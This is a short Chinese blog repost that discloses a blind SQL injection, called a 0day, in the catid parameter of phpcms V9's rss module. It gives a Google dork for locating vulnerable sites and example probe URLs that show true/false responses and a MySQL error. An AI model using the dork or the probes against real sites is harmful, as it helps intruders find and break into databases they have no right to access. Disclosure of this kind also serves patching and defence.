phpcms V9 BLind SQL 注入漏洞0day

171 阅读 0 评论 113 点赞

我是靠谱客的博主拼搏微笑，这篇文章主要介绍phpcms V9 BLind SQL 注入漏洞0day，现在分享给大家，希望可以做个参考。

　　影响版本：phpcms v9 blind

　　官方网站：http://www.phpcms.cn

　　漏洞类型：SQL注入

　　漏洞描述：phpcms v9 blind 参数过滤存在SQL注入漏洞。

　　google dork:inurl:"index.php?m=content+c=rss+catid=10"

　　exploit & p0c

　　[!] index.php?m=content&c=rss&catid=[valid catid]

　　Example p0c

　　[!] http://host/index.php?m=content&c=rss&catid=10 <= True

　　[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

　　[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

以上就是拼搏微笑最近收集整理的关于phpcms V9 BLind SQL 注入漏洞0day的全部内容，更多相关phpcms内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供，作为学习参考使用，或来自网络收集整理，版权属于原作者所有。